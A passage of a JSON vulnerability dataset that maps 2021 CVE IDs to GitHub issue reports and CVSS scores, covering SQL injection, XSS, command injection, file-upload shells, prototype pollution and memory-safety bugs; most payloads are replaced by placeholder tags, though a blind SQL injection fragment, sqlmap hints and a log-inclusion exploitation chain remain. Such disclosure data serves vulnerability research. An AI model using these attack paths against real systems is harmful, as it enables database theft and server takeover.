  74233. "CVE_ID": "CVE-2021-44610",
  74234. "Issue_Url_old": "https://github.com/alexlang24/bloofoxCMS/issues/13",
  74235. "Issue_Url_new": "https://github.com/alexlang24/bloofoxcms/issues/13",
  74236. "Repo_new": "alexlang24/bloofoxcms",
  74237. "Issue_Created_At": "2021-12-02T13:03:52Z",
  74238. "description": "Multiple SQL injection vulnerabilities . APITAG NUMBERTAG have no security filtering of user input parameters in the admin center page. resulting in a large number of sql injection vulnerabilities URLTAG We can use sqlmap to validate\uff1a ERRORTAG FILETAG URLTAG CODETAG FILETAG",
  74239. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  74240. "severity": "CRITICAL",
  74241. "baseScore": 9.8,
  74242. "impactScore": 5.9,
  74243. "exploitabilityScore": 3.9
  74244. },
  74245. {
  74246. "CVE_ID": "CVE-2021-44667",
  74247. "Issue_Url_old": "https://github.com/alibaba/nacos/issues/7359",
  74248. "Issue_Url_new": "https://github.com/alibaba/nacos/issues/7359",
  74249. "Repo_new": "alibaba/nacos",
  74250. "Issue_Created_At": "2021-12-04T19:23:34Z",
  74251. "description": "This is an XSS vulnerability. Nacos has an XSS vulnerability. Trigger condition: no verification required version: Nacos NUMBERTAG payload: APITAG FILETAG",
  74252. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  74253. "severity": "MEDIUM",
  74254. "baseScore": 6.1,
  74255. "impactScore": 2.7,
  74256. "exploitabilityScore": 2.8
  74257. },
  74258. {
  74259. "CVE_ID": "CVE-2021-44684",
  74260. "Issue_Url_old": "https://github.com/dwisiswant0/advisory/issues/5",
  74261. "Issue_Url_new": "https://github.com/dwisiswant0/advisory/issues/5",
  74262. "Repo_new": "dwisiswant0/advisory",
  74263. "Issue_Created_At": "2021-08-05T09:13:27Z",
  74264. "description": "OS Command Injection in huntr ff NUMBERTAG b NUMBERTAG e NUMBERTAG c NUMBERTAG bf NUMBERTAG ec NUMBERTAG a NUMBERTAG Description _TBD_ CVE ID : _N/A_ References _URL_",
  74265. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  74266. "severity": "CRITICAL",
  74267. "baseScore": 9.8,
  74268. "impactScore": 5.9,
  74269. "exploitabilityScore": 3.9
  74270. },
  74271. {
  74272. "CVE_ID": "CVE-2021-44685",
  74273. "Issue_Url_old": "https://github.com/dwisiswant0/advisory/issues/3",
  74274. "Issue_Url_new": "https://github.com/dwisiswant0/advisory/issues/3",
  74275. "Repo_new": "dwisiswant0/advisory",
  74276. "Issue_Created_At": "2021-08-05T09:11:06Z",
  74277. "description": "OS Command Injection in huntr NUMBERTAG Description _TBD_ CVE ID : _N/A_ References _URL_",
  74278. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  74279. "severity": "CRITICAL",
  74280. "baseScore": 9.8,
  74281. "impactScore": 5.9,
  74282. "exploitabilityScore": 3.9
  74283. },
  74284. {
  74285. "CVE_ID": "CVE-2021-44686",
  74286. "Issue_Url_old": "https://github.com/dwisiswant0/advisory/issues/18",
  74287. "Issue_Url_new": "https://github.com/dwisiswant0/advisory/issues/18",
  74288. "Repo_new": "dwisiswant0/advisory",
  74289. "Issue_Created_At": "2021-11-23T15:34:30Z",
  74290. "description": "APITAG in launchpad NUMBERTAG Description _TBD_ CVE ID : _N/A_ References _URL_",
  74291. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  74292. "severity": "HIGH",
  74293. "baseScore": 7.5,
  74294. "impactScore": 3.6,
  74295. "exploitabilityScore": 3.9
  74296. },
  74297. {
  74298. "CVE_ID": "CVE-2021-44866",
  74299. "Issue_Url_old": "https://github.com/projectworldsofficial/Online-Movie-Ticket-Booking-System-in-php/issues/6",
  74300. "Issue_Url_new": "https://github.com/projectworldsofficial/online-movie-ticket-booking-system-in-php/issues/6",
  74301. "Repo_new": "projectworldsofficial/online-movie-ticket-booking-system-in-php",
  74302. "Issue_Created_At": "2021-12-06T08:59:58Z",
  74303. "description": "SQL Injection vulnerability via the \"id\" parameter in FILETAG . Hey, I think there is a SQL Injection vulnerability in this system. The file FILETAG does not perform input validation on the 'id' parameter. So an attacker can append SQL queries to the input to extract sensitive information from the database. APITAG to the about page: Example: URLTAG APITAG the request to file. Example: GET APITAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Connection: close Cookie: APITAG Upgrade Insecure Requests NUMBERTAG APITAG APITAG on the file Example:sqlmap r FILETAG dbms=mysql threads NUMBERTAG APITAG sensitive information from the database FILETAG APITAG FILETAG",
  74304. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  74305. "severity": "HIGH",
  74306. "baseScore": 7.5,
  74307. "impactScore": 3.6,
  74308. "exploitabilityScore": 3.9
  74309. },
  74310. {
  74311. "CVE_ID": "CVE-2021-44868",
  74312. "Issue_Url_old": "https://github.com/ming-soft/MCMS/issues/58",
  74313. "Issue_Url_new": "https://github.com/ming-soft/mcms/issues/58",
  74314. "Repo_new": "ming-soft/mcms",
  74315. "Issue_Created_At": "2021-12-05T17:24:31Z",
  74316. "description": "MCMS NUMBERTAG PATHTAG has a SQL Injection Vulnerability. Vulnerability file: PATHTAG Vulnerability tracking path: CODETAG poc ERRORTAG FILETAG",
  74317. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  74318. "severity": "CRITICAL",
  74319. "baseScore": 9.8,
  74320. "impactScore": 5.9,
  74321. "exploitabilityScore": 3.9
  74322. },
  74323. {
  74324. "CVE_ID": "CVE-2021-44892",
  74325. "Issue_Url_old": "https://github.com/Stakcery/Web-Security/issues/1",
  74326. "Issue_Url_new": "https://github.com/y4tacker/web-security/issues/1",
  74327. "Repo_new": "y4tacker/web-security",
  74328. "Issue_Created_At": "2021-12-07T13:08:51Z",
  74329. "description": "APITAG has a remote command execution vulnerability. Some time ago I submitted a vulnerability in the Chinese APITAG are the details. You can find this in URLTAG This is due to the combination of two functions(thinkphp) resulting in the command execution ERRORTAG As you know, these two functions are related to template rendering, and this combination has been seen in Chinese APITAG are the utilization details; First we create the route according to the official documentation; At first\uff0ccreate APITAG ERRORTAG then create APITAG APITAG is no need for any content in this like this FILETAG then We need APITAG it can send payload without url encoded characters APITAG FILETAG thinkphp will save access logs APITAG with date FILETAG then we just need to type url below: ERRORTAG success\uff01\uff01\uff01we can contain malicious payloads\uff01\uff01\uff01 FILETAG Next I will explain how this vulnerability was created. The following simplifies my narrative with pictures instead of words FILETAG then We can override the parameters in $this APITAG FILETAG then follow the function display FILETAG follow FILETAG Default parsing engine value is Think FILETAG follow FILETAG Continue, APITAG FILETAG Go to the exec method and call the run method of the APITAG class to process the value of $params with the path to the log file after processing go to APITAG FILETAG in PATHTAG FILETAG Go to the fetch method in the APITAG class, get the path to the cache file, and then go to the load method in Storage FILETAG Follow up to the load method of Storage, the filename is the previously fetched cache storage Document Document path path and var is the array with _filename=path to the log file FILETAG Finally we can include log files with malicious code",
  74330. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  74331. "severity": "HIGH",
  74332. "baseScore": 8.8,
  74333. "impactScore": 5.9,
  74334. "exploitabilityScore": 2.8
  74335. },
  74336. {
  74337. "CVE_ID": "CVE-2021-44906",
  74338. "Issue_Url_old": "https://github.com/substack/minimist/issues/164",
  74339. "Issue_Url_new": "https://github.com/substack/minimist/issues/164",
  74340. "Repo_new": "substack/minimist",
  74341. "Issue_Created_At": "2022-03-15T03:02:02Z",
  74342. "description": "insufficient fix for prototype pollution in APITAG Despite the fix in URLTAG , there is still a way to exploit prototype pollution vulnerability. More specifically, there are handlers for prototypes of Object, String and Number, but no handler for the APITAG This prototype can be accessed through the default \u201c_\u201d property in the parsed arguments, which is an array. If the app developer sets properties on function objects (use case discussed here: URLTAG ), this can lead to undesired behavior.",
  74343. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  74344. "severity": "CRITICAL",
  74345. "baseScore": 9.8,
  74346. "impactScore": 5.9,
  74347. "exploitabilityScore": 3.9
  74348. },
  74349. {
  74350. "CVE_ID": "CVE-2021-44906",
  74351. "Issue_Url_old": "https://github.com/minimistjs/minimist/issues/11",
  74352. "Issue_Url_new": "https://github.com/minimistjs/minimist/issues/11",
  74353. "Repo_new": "minimistjs/minimist",
  74354. "Issue_Created_At": "2022-10-19T14:23:14Z",
  74355. "description": "Backport of NUMBERTAG fixes to NUMBERTAG Thanks to the new maintainers for taking over this project. I see a new version of the NUMBERTAG line has been published even though it still _seems_ to be covered by CVETAG URLTAG . Is there any possibility of the FILETAG being backported, or is it necessary at all? I ask because the maintainers of one of the other packages we use have thus far not responded to suggestions to update URLTAG and a patch update to the NUMBERTAG line would obviate the need for that. And yes, I'm aware we can also use yarn resolutions, NPM overrides, etc. and the risk is probably fairly minimal in our use case \u2013 but I assume there's a reason the NUMBERTAG line is being maintained.",
  74356. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  74357. "severity": "CRITICAL",
  74358. "baseScore": 9.8,
  74359. "impactScore": 5.9,
  74360. "exploitabilityScore": 3.9
  74361. },
  74362. {
  74363. "CVE_ID": "CVE-2021-44908",
  74364. "Issue_Url_old": "https://github.com/balderdashy/sails/issues/7209",
  74365. "Issue_Url_new": "https://github.com/balderdashy/sails/issues/7209",
  74366. "Repo_new": "balderdashy/sails",
  74367. "Issue_Created_At": "2022-03-15T03:02:07Z",
  74368. "description": "Prototype pollution in APITAG Node version NUMBERTAG Sails version _(sails NUMBERTAG else if statement in lines NUMBERTAG URLTAG is vulnerable to prototype pollution. The object assignment on line NUMBERTAG may lead to denial of service or property injection if APITAG based application dynamically controls the value of variable APITAG Proof of concept case is demonstrated here: URLTAG",
  74369. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  74370. "severity": "CRITICAL",
  74371. "baseScore": 9.8,
  74372. "impactScore": 5.9,
  74373. "exploitabilityScore": 3.9
  74374. },
  74375. {
  74376. "CVE_ID": "CVE-2021-44911",
  74377. "Issue_Url_old": "https://github.com/xpressengine/xe-core/issues/2434",
  74378. "Issue_Url_new": "https://github.com/xpressengine/xe-core/issues/2434",
  74379. "Repo_new": "xpressengine/xe-core",
  74380. "Issue_Created_At": "2021-12-08T00:38:20Z",
  74381. "description": "Unrestricted file upload vulnerability in Latest Release NUMBERTAG Affected version: XE before NUMBERTAG Vulnerable file: PATHTAG menu_active_btn Causes of vulnerability: FILETAG When uploading the Mouse over button and When selected button , there is no restriction on the file suffix, which leads to any file uploading to the files directory. Since .htaccess only restricts the PHP type, uploading HTML type files leads to stored XSS vulnerabilities. If the .htaccess configuration is improper, for example before the XE NUMBERTAG version, you can upload the PHP type file to GETSHELL. deny access to files that may contain sensitive information APITAG ^(. APITAG FILETAG Repair suggestion: add the html file to the upload blacklist.",
  74382. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  74383. "severity": "MEDIUM",
  74384. "baseScore": 5.4,
  74385. "impactScore": 2.7,
  74386. "exploitabilityScore": 2.3
  74387. },
  74388. {
  74389. "CVE_ID": "CVE-2021-44912",
  74390. "Issue_Url_old": "https://github.com/xpressengine/xe-core/issues/2433",
  74391. "Issue_Url_new": "https://github.com/xpressengine/xe-core/issues/2433",
  74392. "Repo_new": "xpressengine/xe-core",
  74393. "Issue_Created_At": "2021-12-08T00:36:19Z",
  74394. "description": "Unrestricted file upload vulnerability in Latest Release NUMBERTAG APITAG Affected version: XE before NUMBERTAG Vulnerable file: PATHTAG menu_normal_btn Causes of vulnerability: FILETAG When uploading the Normal button, there is no restriction on the file suffix, which leads to any file uploading to the files directory. Since .htaccess only restricts the PHP type, uploading HTML type files leads to stored XSS vulnerabilities. If the .htaccess configuration is improper, for example before the XE NUMBERTAG version, you can upload the PHP type file to GETSHELL. CODETAG FILETAG Repair suggestion: add the \\ html\\ file to the upload blacklist.",
  74395. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  74396. "severity": "MEDIUM",
  74397. "baseScore": 5.4,
  74398. "impactScore": 2.7,
  74399. "exploitabilityScore": 2.3
  74400. },
  74401. {
  74402. "CVE_ID": "CVE-2021-44915",
  74403. "Issue_Url_old": "https://github.com/taogogo/taocms/issues/8",
  74404. "Issue_Url_new": "https://github.com/taogogo/taocms/issues/8",
  74405. "Repo_new": "taogogo/taocms",
  74406. "Issue_Created_At": "2021-12-07T08:51:23Z",
  74407. "description": "There is SQL blind injection at APITAG APITAG administrator authority). Log in to the background as the default account admin. FILETAG We click in order and grab packets: FILETAG FILETAG FILETAG There is a time based blind SQL injection vulnerability in the location of id. FILETAG FILETAG POC: FILETAG APITAG AND (SELECT NUMBERTAG FROM APITAG AND APITAG sqlmap: Save the HTTP request package as a file . FILETAG Test using the APITAG tool : FILETAG",
  74408. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  74409. "severity": "HIGH",
  74410. "baseScore": 7.2,
  74411. "impactScore": 5.9,
  74412. "exploitabilityScore": 1.2
  74413. },
  74414. {
  74415. "CVE_ID": "CVE-2021-44918",
  74416. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1968",
  74417. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1968",
  74418. "Repo_new": "gpac/gpac",
  74419. "Issue_Created_At": "2021-12-10T14:52:20Z",
  74420. "description": "Null Pointer Dereference in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result poc NUMBERTAG ERRORTAG poc NUMBERTAG ERRORTAG gdb poc NUMBERTAG CODETAG poc NUMBERTAG CODETAG",
  74421. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  74422. "severity": "MEDIUM",
  74423. "baseScore": 5.5,
  74424. "impactScore": 3.6,
  74425. "exploitabilityScore": 1.8
  74426. },
  74427. {
  74428. "CVE_ID": "CVE-2021-44919",
  74429. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1963",
  74430. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1963",
  74431. "Repo_new": "gpac/gpac",
  74432. "Issue_Created_At": "2021-12-10T09:54:17Z",
  74433. "description": "Null Pointer Dereference in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result ERRORTAG gdb ERRORTAG",
  74434. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  74435. "severity": "MEDIUM",
  74436. "baseScore": 5.5,
  74437. "impactScore": 3.6,
  74438. "exploitabilityScore": 1.8
  74439. },
  74440. {
  74441. "CVE_ID": "CVE-2021-44920",
  74442. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1957",
  74443. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1957",
  74444. "Repo_new": "gpac/gpac",
  74445. "Issue_Created_At": "2021-12-10T08:00:30Z",
  74446. "description": "Invalid memory address dereference in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result ERRORTAG gdb CODETAG",
  74447. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  74448. "severity": "MEDIUM",
  74449. "baseScore": 5.5,
  74450. "impactScore": 3.6,
  74451. "exploitabilityScore": 1.8
  74452. },
  74453. {
  74454. "CVE_ID": "CVE-2021-44921",
  74455. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1964",
  74456. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1964",
  74457. "Repo_new": "gpac/gpac",
  74458. "Issue_Created_At": "2021-12-10T10:59:02Z",
  74459. "description": "Null Pointer Dereference in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result CODETAG gdb CODETAG",
  74460. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  74461. "severity": "MEDIUM",
  74462. "baseScore": 5.5,
  74463. "impactScore": 3.6,
  74464. "exploitabilityScore": 1.8
  74465. },
  74466. {
  74467. "CVE_ID": "CVE-2021-44922",
  74468. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1969",
  74469. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1969",
  74470. "Repo_new": "gpac/gpac",
  74471. "Issue_Created_At": "2021-12-10T15:21:14Z",
  74472. "description": "Null Pointer Dereference in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result ERRORTAG gdb CODETAG APITAG CODETAG CODETAG",
  74473. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  74474. "severity": "MEDIUM",
  74475. "baseScore": 5.5,
  74476. "impactScore": 3.6,
  74477. "exploitabilityScore": 1.8
  74478. },
  74479. {
  74480. "CVE_ID": "CVE-2021-44923",
  74481. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1962",
  74482. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1962",
  74483. "Repo_new": "gpac/gpac",
  74484. "Issue_Created_At": "2021-12-10T09:31:57Z",
  74485. "description": "Null Pointer Dereference in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result ERRORTAG gdb ERRORTAG",
  74486. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  74487. "severity": "MEDIUM",
  74488. "baseScore": 5.5,
  74489. "impactScore": 3.6,
  74490. "exploitabilityScore": 1.8
  74491. },
  74492. {
  74493. "CVE_ID": "CVE-2021-44924",
  74494. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1959",
  74495. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1959",
  74496. "Repo_new": "gpac/gpac",
  74497. "Issue_Created_At": "2021-12-10T08:26:37Z",
  74498. "description": "Infinite loop in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result CODETAG gdb CODETAG",
  74499. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  74500. "severity": "MEDIUM",
  74501. "baseScore": 5.5,
  74502. "impactScore": 3.6,
  74503. "exploitabilityScore": 1.8
  74504. },
  74505. {
  74506. "CVE_ID": "CVE-2021-44925",
  74507. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1967",
  74508. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1967",
  74509. "Repo_new": "gpac/gpac",
  74510. "Issue_Created_At": "2021-12-10T14:38:22Z",
  74511. "description": "Null Pointer Dereference in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result ERRORTAG gdb CODETAG",
  74512. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  74513. "severity": "MEDIUM",
  74514. "baseScore": 5.5,
  74515. "impactScore": 3.6,
  74516. "exploitabilityScore": 1.8
  74517. },
  74518. {
  74519. "CVE_ID": "CVE-2021-44926",
  74520. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1961",
  74521. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1961",
  74522. "Repo_new": "gpac/gpac",
  74523. "Issue_Created_At": "2021-12-10T09:26:26Z",
  74524. "description": "Null Pointer Dereference in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result ERRORTAG gdb CODETAG",
  74525. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  74526. "severity": "MEDIUM",
  74527. "baseScore": 5.5,
  74528. "impactScore": 3.6,
  74529. "exploitabilityScore": 1.8
  74530. },
  74531. {
  74532. "CVE_ID": "CVE-2021-44927",
  74533. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1960",
  74534. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1960",
  74535. "Repo_new": "gpac/gpac",
  74536. "Issue_Created_At": "2021-12-10T08:38:06Z",
  74537. "description": "Null Pointer Dereference in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result ERRORTAG gdb CODETAG",
  74538. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  74539. "severity": "MEDIUM",
  74540. "baseScore": 5.5,
  74541. "impactScore": 3.6,
  74542. "exploitabilityScore": 1.8
  74543. },
  74544. {
  74545. "CVE_ID": "CVE-2021-44935",
  74546. "Issue_Url_old": "https://github.com/glFusion/glfusion/issues/482",
  74547. "Issue_Url_new": "https://github.com/glfusion/glfusion/issues/482",
  74548. "Repo_new": "glfusion/glfusion",
  74549. "Issue_Created_At": "2021-12-08T08:13:57Z",
  74550. "description": "Arbitrary user impersonation vulnerability. In the article comments\uff0cWe can impersonate any user to APITAG can even impersonate a system administrator FILETAG FILETAG )",
  74551. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
  74552. "severity": "CRITICAL",
  74553. "baseScore": 9.1,
  74554. "impactScore": 5.2,
  74555. "exploitabilityScore": 3.9
  74556. },
  74557. {
  74558. "CVE_ID": "CVE-2021-44937",
  74559. "Issue_Url_old": "https://github.com/glFusion/glfusion/issues/485",
  74560. "Issue_Url_new": "https://github.com/glfusion/glfusion/issues/485",
  74561. "Repo_new": "glfusion/glfusion",
  74562. "Issue_Created_At": "2021-12-09T06:17:55Z",
  74563. "description": "APITAG CMS NUMBERTAG Arbitrary user registration vulnerability. There is a logical problem with the user registration page After clicking the register button, the user does not need to confirm the email. The system directly saves the submitted content in the database. This leads to a problem. An attacker can register with the mailbox of any user. When users want to register, they will find that the mailbox has been occupied. FILETAG",
  74564. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
  74565. "severity": "MEDIUM",
  74566. "baseScore": 5.3,
  74567. "impactScore": 1.4,
  74568. "exploitabilityScore": 3.9
  74569. },
  74570. {
  74571. "CVE_ID": "CVE-2021-44942",
  74572. "Issue_Url_old": "https://github.com/glFusion/glfusion/issues/486",
  74573. "Issue_Url_new": "https://github.com/glfusion/glfusion/issues/486",
  74574. "Repo_new": "glfusion/glfusion",
  74575. "Issue_Created_At": "2021-12-09T07:11:09Z",
  74576. "description": "APITAG CMS NUMBERTAG FILETAG CSRF vulnerability. Attackers can construct blacklist IP addresses. Using the CSRF vulnerability to trick the administrator to click, can add a blacklist poc CODETAG FILETAG FILETAG",
  74577. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
  74578. "severity": "MEDIUM",
  74579. "baseScore": 4.3,
  74580. "impactScore": 1.4,
  74581. "exploitabilityScore": 2.8
  74582. },
  74583. {
  74584. "CVE_ID": "CVE-2021-44949",
  74585. "Issue_Url_old": "https://github.com/glFusion/glfusion/issues/487",
  74586. "Issue_Url_new": "https://github.com/glfusion/glfusion/issues/487",
  74587. "Repo_new": "glfusion/glfusion",
  74588. "Issue_Created_At": "2021-12-09T10:12:28Z",
  74589. "description": "APITAG CMS NUMBERTAG user Login denied vulnerability. We can get username on this link: APITAG FILETAG So, an attacker can get all usernames. Then they can always log in to all users with the wrong password, which will prevent all users from logging in to the website normally. FILETAG There are two solutions NUMBERTAG set the verification code on the login page NUMBERTAG The second is to display the user's nickname instead of the login name",
  74590. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  74591. "severity": "CRITICAL",
  74592. "baseScore": 9.8,
  74593. "impactScore": 5.9,
  74594. "exploitabilityScore": 3.9
  74595. },
  74596. {
  74597. "CVE_ID": "CVE-2021-44956",
  74598. "Issue_Url_old": "https://github.com/rockcarry/ffjpeg/issues/43",
  74599. "Issue_Url_new": "https://github.com/rockcarry/ffjpeg/issues/43",
  74600. "Repo_new": "rockcarry/ffjpeg",
  74601. "Issue_Created_At": "2021-06-23T19:48:31Z",
  74602. "description": "Heap buffer overflows in APITAG at APITAG and NUMBERTAG Describe Two Heap buffer overflows were discovered in ffjpeg. The issues are being triggered in function jfif_decode at APITAG and NUMBERTAG Found by Cem Onat Karagun of Diesec System info OS version : Ubuntu NUMBERTAG ffjpeg Version : master NUMBERTAG fa4cf8a NUMBERTAG URLTAG Reproduce Compile ffjpeg with address sanitizer. APITAG POC Files: FILETAG FILETAG Run POCs with the commands below. APITAG Asan output NUMBERTAG ERRORTAG Asan output NUMBERTAG ERRORTAG",
  74603. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  74604. "severity": "MEDIUM",
  74605. "baseScore": 6.5,
  74606. "impactScore": 3.6,
  74607. "exploitabilityScore": 2.8
  74608. },
  74609. {
  74610. "CVE_ID": "CVE-2021-44957",
  74611. "Issue_Url_old": "https://github.com/rockcarry/ffjpeg/issues/44",
  74612. "Issue_Url_new": "https://github.com/rockcarry/ffjpeg/issues/44",
  74613. "Repo_new": "rockcarry/ffjpeg",
  74614. "Issue_Created_At": "2021-06-23T19:51:49Z",
  74615. "description": "global buffer overflow in function jfif_encode at APITAG Describe A global buffer overflow was discovered in ffjpeg. The issue is being triggered in function jfif_encode at APITAG Found by Cem Onat Karagun of Diesec System info OS version : Ubuntu NUMBERTAG ffjpeg Version : master NUMBERTAG fa4cf8a NUMBERTAG URLTAG Reproduce Compile ffjpeg with address sanitizer. APITAG APITAG file: FILETAG Run with the following command. APITAG Asan output: ERRORTAG APITAG",
  74616. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  74617. "severity": "MEDIUM",
  74618. "baseScore": 6.5,
  74619. "impactScore": 3.6,
  74620. "exploitabilityScore": 2.8
  74621. },
  74622. {
  74623. "CVE_ID": "CVE-2021-44960",
  74624. "Issue_Url_old": "https://github.com/svgpp/svgpp/issues/101",
  74625. "Issue_Url_new": "https://github.com/svgpp/svgpp/issues/101",
  74626. "Repo_new": "svgpp/svgpp",
  74627. "Issue_Created_At": "2021-12-06T16:55:10Z",
  74628. "description": "New vulnerability. FILETAG APITAG The APITAG function in the APITAG function handled the APITAG object improperly, returning a null pointer in advance at the second if, resulting in a null pointer reference behind the APITAG function. APITAG APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG d NUMBERTAG e bp NUMBERTAG fffc6d NUMBERTAG dd0 sp NUMBERTAG fffc6d NUMBERTAG T0) APITAG signal is caused by a READ memory access. APITAG address points to the zero page NUMBERTAG d NUMBERTAG e in APITAG const PATHTAG NUMBERTAG d NUMBERTAG e in APITAG const APITAG const ) PATHTAG NUMBERTAG d NUMBERTAG e in bool APITAG APITAG APITAG double, svgpp::tag::length_units::mm> const> >, APITAG >, APITAG APITAG APITAG APITAG APITAG >, APITAG >, APITAG >, APITAG APITAG APITAG APITAG const , Canvas, APITAG const const&, Canvas&, svgpp::tag::element::svg) PATHTAG NUMBERTAG d NUMBERTAG e in bool APITAG APITAG APITAG double, svgpp::tag::length_units::mm> const> >, APITAG >, APITAG APITAG APITAG APITAG APITAG >, APITAG >, APITAG >, APITAG APITAG APITAG APITAG const , APITAG const const&, Canvas&) PATHTAG NUMBERTAG d NUMBERTAG e in APITAG APITAG PATHTAG NUMBERTAG d8b NUMBERTAG in main PATHTAG NUMBERTAG fb2c6bd3d NUMBERTAG in __libc_start_main PATHTAG NUMBERTAG bc9 in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV PATHTAG in APITAG const NUMBERTAG ABORTING APITAG",
  74629. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  74630. "severity": "MEDIUM",
  74631. "baseScore": 6.5,
  74632. "impactScore": 3.6,
  74633. "exploitabilityScore": 2.8
  74634. },
  74635. {
  74636. "CVE_ID": "CVE-2021-44969",
  74637. "Issue_Url_old": "https://github.com/taogogo/taocms/issues/9",
  74638. "Issue_Url_new": "https://github.com/taogogo/taocms/issues/9",
  74639. "Repo_new": "taogogo/taocms",
  74640. "Issue_Created_At": "2021-12-09T12:19:43Z",
  74641. "description": "There is a storage type cross site scripting attack at APITAG APITAG administrator authority) . First, we enter the background and use the column administrator admin we created: FILETAG Let's click \"add article\" on the left: FILETAG Insert xss payload at the title \uff1a APITAG APITAG Return to the background management APITAG click \"edit article\" on the left: FILETAG Come back to the front APITAG it is the title of the article, the front desk is also affected FILETAG",
  74642. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  74643. "severity": "MEDIUM",
  74644. "baseScore": 4.8,
  74645. "impactScore": 2.7,
  74646. "exploitabilityScore": 1.7
  74647. },
  74648. {
  74649. "CVE_ID": "CVE-2021-44974",
  74650. "Issue_Url_old": "https://github.com/radareorg/radare2/issues/19478",
  74651. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/19478",
  74652. "Repo_new": "radareorg/radare2",
